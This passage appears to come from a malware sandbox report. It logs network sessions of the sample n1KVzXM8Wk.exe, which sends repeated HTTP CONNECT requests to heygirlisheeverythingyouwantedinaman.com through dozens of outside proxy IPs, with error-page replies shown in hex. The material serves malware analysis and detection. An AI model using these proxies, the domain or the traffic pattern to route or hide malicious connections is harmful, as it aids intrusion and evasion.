                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.974900007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:11.021781921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      924192.168.2.452712197.159.130.13456786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.960220098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      925192.168.2.452809212.31.100.13841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.960468054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      926192.168.2.45283444.190.9.65481006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.963972092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      927192.168.2.4527288.213.129.1541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.976718903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.296812057 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      928192.168.2.452280133.18.234.13806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.986394882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.302551985 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                                      Data Ascii: Backend not available


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      929192.168.2.45279541.77.188.131806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.006247044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740544081 CET933INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 622
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      930192.168.2.452804185.204.197.2580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.066204071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.315546036 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      931192.168.2.452206144.24.77.90555556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.066214085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      932192.168.2.450739121.229.101.9610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.078775883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      933192.168.2.452845107.161.50.4264016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.083961010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      934192.168.2.452782114.108.177.104609846812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.086376905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      935192.168.2.450736103.79.152.20456786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.087477922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      936192.168.2.45275758.246.58.15090026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.095385075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.423716068 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      937192.168.2.452854162.159.242.7806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.095385075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.184454918 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      938192.168.2.44998841.65.236.3719766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.099025011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169744015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292490005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.334914923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.334295034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.334268093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:11.458997965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      939192.168.2.452789119.39.68.7923236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.101618052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      940192.168.2.450873185.23.118.103604296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.101789951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178199053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178685904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.178689003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      941192.168.2.452842198.49.68.80806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.103219986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.223685026 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 663
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 64 66 67 68 68 73 64 66 67 68 40 61 73 64 66 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at dfghhsdfgh@asdf.com to inform them of the time this e
                                                                                                      Feb 23, 2024 09:45:24.223716974 CET303INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                                                      Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      942192.168.2.45004747.243.177.21080886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.123214960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169842005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292500973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      943192.168.2.45077749.249.155.3806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.129887104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178215027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680305958 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                                      Feb 23, 2024 09:45:30.680417061 CET295INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                                      Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      944192.168.2.452776188.166.197.12931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.129894972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      945192.168.2.452754103.49.202.250806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.173336983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      946192.168.2.452784203.154.39.146806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.177862883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      947192.168.2.452852184.170.245.14841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.197073936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      948192.168.2.45094251.222.241.15725636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.201910019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365648985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      949192.168.2.452267103.146.196.97326506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.202033043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
